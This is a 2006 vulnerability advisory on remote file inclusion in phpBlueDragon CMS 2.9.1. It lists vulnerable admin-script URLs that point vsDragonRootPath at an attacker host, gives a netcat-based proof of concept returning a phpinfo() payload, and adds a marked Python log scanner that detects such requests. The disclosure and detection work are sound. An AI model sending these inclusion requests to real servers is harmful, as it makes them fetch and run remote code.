SECURITYVULNS:DOC:13313
Jun 25, 2006 - 12:00 a.m.

phpBlueDragon CMS 2.9.1 multiple remote file inclusion vuln

vulners.com

PHPBlueDragon CMS <= 2.9.1 http://phpbluedragon.net/

Affected files:

root_includes/root_modules/team_admin.php?action=move_item&template_redirect=yes&vsDragonRootPath=http://bad.hacker.com:6666/
root_includes/root_modules/rss_admin.php?action=move_item&template_redirect=yes&vsDragonRootPath=http://bad.hacker.com:6666/
root_includes/root_modules/manual_admin.php?action=move_item&template_redirect=yes&vsDragonRootPath=http://bad.hacker.com:6666/
root_includes/root_modules/forum_admin.php?action=group_move&template_redirect=yes&vsDragonRootPath=http://bad.hacker.com:6666/
root_includes/root_modules/forum_admin.php?action=forum_move&template_redirect=yes&vsDragonRootPath=http://bad.hacker.com:6666/

Solution:

None

Simple PoC:

nc -l -p 9999

http://some.site/root_includes/root_modules/forum_admin.php?action=forum_move&template_redirect=yes&vsDragonRootPath=http://192.168.0.xx:9999/

$ nc -l -p 9999
GET /public_includes/pub_kernel/pbd_move. HTTP/1.0
Host: 192.168.0.xx:9999

HTTP/0.9 200 OK

<?php phpinfo(); ?>

System OpenBSD xxx 3.9 xxx i386
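Since no vendor fix is listed, the practical defender's step is to detect attempts in the web server's access log. The following is an added example, not part of the advisory: it parses combined-format log lines, looks for requests to the affected admin scripts whose vsDragonRootPath parameter carries a remote stream wrapper (the pattern the PoC above relies on), and reports them. The sample log lines and the 192.168.0.10 address are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Scripts the advisory lists as including files relative to vsDragonRootPath.
AFFECTED_SCRIPTS = (
    "root_includes/root_modules/team_admin.php",
    "root_includes/root_modules/rss_admin.php",
    "root_includes/root_modules/manual_admin.php",
    "root_includes/root_modules/forum_admin.php",
)
PARAM = "vsDragonRootPath"

# Combined/common log format: ip ident user [time] "METHOD target HTTP/x.y" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
# Anything that makes PHP's include() fetch from outside the web root.
REMOTE_RE = re.compile(r"^(https?|ftp)://|^(data|php|phar)://", re.I)

def classify_request(target):
    """Return a finding dict for an RFI attempt against an affected script, else None."""
    parts = urlsplit(target)
    # Collapse "//" (the advisory's rss_admin path uses one) so the suffix check still matches.
    path = re.sub(r"/+", "/", parts.path).lstrip("/")
    if not any(path.endswith(s) for s in AFFECTED_SCRIPTS):
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    value = qs.get(PARAM, [""])[0]
    if not REMOTE_RE.match(value):
        return None
    return {"script": path, "root_path": value, "action": qs.get("action", [""])[0]}

def scan_log(lines):
    """Yield one finding per log line that carries a remote vsDragonRootPath."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        finding = classify_request(m.group("target"))
        if finding:
            finding.update(ip=m.group("ip"), status=m.group("status"))
            hits.append(finding)
    return hits

# Constructed sample log lines; the first mirrors the shape of the PoC request above.
SAMPLE_LOG = [
    '203.0.113.7 - - [25/Jun/2006:00:00:01 +0000] "GET /root_includes/root_modules/forum_admin.php?action=forum_move&template_redirect=yes&vsDragonRootPath=http://192.168.0.10:9999/ HTTP/1.0" 200 512',
    '203.0.113.7 - - [25/Jun/2006:00:00:02 +0000] "GET /root_includes/root_modules//rss_admin.php?action=move_item&vsDragonRootPath=http%3A%2F%2F192.168.0.10%3A9999%2F HTTP/1.0" 200 512',
    '198.51.100.4 - - [25/Jun/2006:00:00:03 +0000] "GET /root_includes/root_modules/forum_admin.php?action=forum_move&vsDragonRootPath=../ HTTP/1.0" 200 512',
    '198.51.100.4 - - [25/Jun/2006:00:00:04 +0000] "GET /index.php?page=1 HTTP/1.0" 200 512',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Only the two lines pointing vsDragonRootPath at a remote URL are reported; the local "../" value is a different (traversal) case and is deliberately left to a separate rule.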

Credits:
shm